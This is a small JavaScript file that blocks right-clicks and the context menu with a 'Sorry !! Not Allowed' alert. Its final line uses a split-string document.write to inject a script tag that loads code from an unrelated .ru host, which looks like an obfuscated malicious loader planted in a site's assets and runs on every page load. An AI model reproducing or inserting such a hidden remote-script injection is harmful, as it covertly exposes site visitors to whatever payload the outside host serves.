// JavaScript Document
pp = "Sorry !! Not Allowed";

codeNS = navigator.appName=="Netscape"
codeIE = navigator.appName=="Microsoft Internet Explorer"
function noclick(e) {
if (codeNS && e.which > 1)
	 {alert(pp)
	 return false} 
else if (codeIE && (event.button >1)) 
	 {alert(pp)
	 return false;}
}
document.onmousedown = noclick;
document.oncontextmenu=new Function("return false")
if (document.layers) window.captureEvents(Event.MOUSEDOWN);


document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></scr'+'ipt>');